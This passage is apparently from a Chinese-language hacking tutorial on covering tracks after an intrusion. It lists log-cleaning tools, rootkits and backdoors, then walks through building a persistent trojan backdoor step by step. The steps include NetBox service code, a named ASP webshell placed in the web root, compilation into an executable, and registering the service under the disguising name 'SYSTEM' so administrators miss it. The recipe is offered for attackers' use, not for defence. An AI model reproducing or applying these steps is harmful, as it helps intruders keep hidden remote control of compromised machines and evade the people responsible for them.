5、隱藏技術及其新發展
攻擊者在完成其攻擊目標後,通常會採取隱藏技術來消除攻擊留下的蛛絲馬跡,避免被系統管理員發現,同時還會盡量保留隱蔽的通道,使其以後還能輕易的重新進入目標系統。隱藏技術主要包括日誌清理、內核套件、安裝後門等。
第1種,日誌清理。日誌清理主要對系統日誌中攻擊者留下的訪問記錄進行清除,從而有效地抹除自己的動蹤跡。Unix平台下較常用的日誌清理工具包括zap、wzap、wted 和remove。攻擊者通常在獲得特權用戶訪問權後會安裝一些後門工具,以便輕易地重新進入或遠程控制該主機,著名的後門工具包括BO、netbus和稱為「瑞士軍刀」的netcat等;攻擊者還可對系統程序進行特洛伊木馬化,使其隱藏攻擊者留下的程序、服務等。
第2種,內核套件。內核套件則直接控制操作系統內核,提供給攻擊者一個完整的隱藏自身的工具包,著名的有knark for Linux、Linux Root Kit 及rootkit。
第3種,安裝木馬後門。木馬的危害性在於它對電腦系統強大的控制和破壞能力,竊取密碼、控制系統操作、進行文件操作等等,一般的木馬都有客戶端和服務器端兩個執行程序,其中客戶端是用於攻擊者遠程控制植入木馬的機器,服務器端程序即是木馬程序。木馬在被植入攻擊主機後,它一般會通過一定的方式把入侵主機的信息,如主機的IP地址、木馬植入的端口等發送給攻擊者,這樣攻擊者有這些信息才能夠與木馬裡應外合控制攻擊主機。本文將通過網絡盒子NetBox做一個木馬,它可以方便的將ASP等腳本編譯成為獨立運行的執行程序,完全不用考慮平台兼容性要求。步驟如下:
第1步:創建一個NetBox應用。創建一個空的目錄,假設是c:\web;同時,在目錄中創建一個文件,命名為main.box,其內容為:複製內容到剪貼板
代碼:
Dim httpd
'------------設置在服務中運行的名稱,可適當修改進行隱藏---------------------
Shell.Service.RunService "NBWeb", "NetBox Web Server", "NetBox Http Server Sample"
'---------------------- 設置服務器啟動---------------------
Sub OnServiceStart()
Set httpd = CreateObject("NetBox.HttpServer")
'-------以下設置瀏覽端口,可修改為其他參數,或更改wwwroot目錄----
If httpd.Create("", 8080) = 0 Then
Set host = httpd.AddHost("", "\wwwroot")
host.EnableScript = true
host.AddDefault "default.asp"
host.AddDefault "default.htm"
httpd.Start
else
Shell.Quit 0
end if
End Sub
Sub OnServiceStop()
httpd.Close
End Sub
Sub OnServicePause()
httpd.Stop
End Sub
Sub OnServiceResume()
httpd.Start
End Sub
第2步:設置木馬運行環境。在c:\web目錄中再創建一個子目錄wwwroot,並將我們所需要的ASP木馬文件全部複製到wwwroot 中,這裡選用的是海陽頂端ASP木馬。此時,ASP運行環境應該已經準備好了。為了運行新建的NetBox 應用,必須確認8080端口沒有被其他程序佔用。雙擊main.box文件,就可以在窗口右下角看見NetBox的圖標。此時,NetBox 已經正常運行了。現在,訪訪客無法瀏覽此圖片或連結,請先 註冊 或 登入會員 。測試ASP木馬是否能正常運行。這種木馬的好處是,不用擔心有日誌記錄。但是現在它還遠不是一個後門,只是提供了與IIS相當的功能
第3步:編譯。執行「NetBox Deployment Wizard」,點擊「選擇文件夾」,找到剛才建立的目錄C:\web,設置文件類型和輸出文件名後,點「Build...(編譯)」按鈕,開始編譯,就得到了編譯成功的那個執行文件。因為這個例程是以服務方式創建的Web 服務器,所以可以在命令行下執行:myapp -install將應用安裝成為服務,這樣,系統無須登錄便可以自動運行應用了。如果需要卸載服務,則可以在命令行下執行如下命令:myapp –remove。(myapp代表輸出的應用文件名,如本例中的test),如圖5所示。
NetBox Deployment Wizard
第4步:隱藏服務。要達到「神不知鬼不覺」的效果,首先需要把應用程序添加為服務,我們可以使用Windows提供的Instsrv.exe和Srvany.exe這兩個小軟件。在命令行下,先把Instsrv.exe把Srvany.exe註冊為服務。格式為:INSTSRV 服務名 SRVANY的路徑,如:「INSTSRV SYSTEM C:\WEB\SRVANY.EXE」。其中SYSTEM是為了便於隱藏服務名。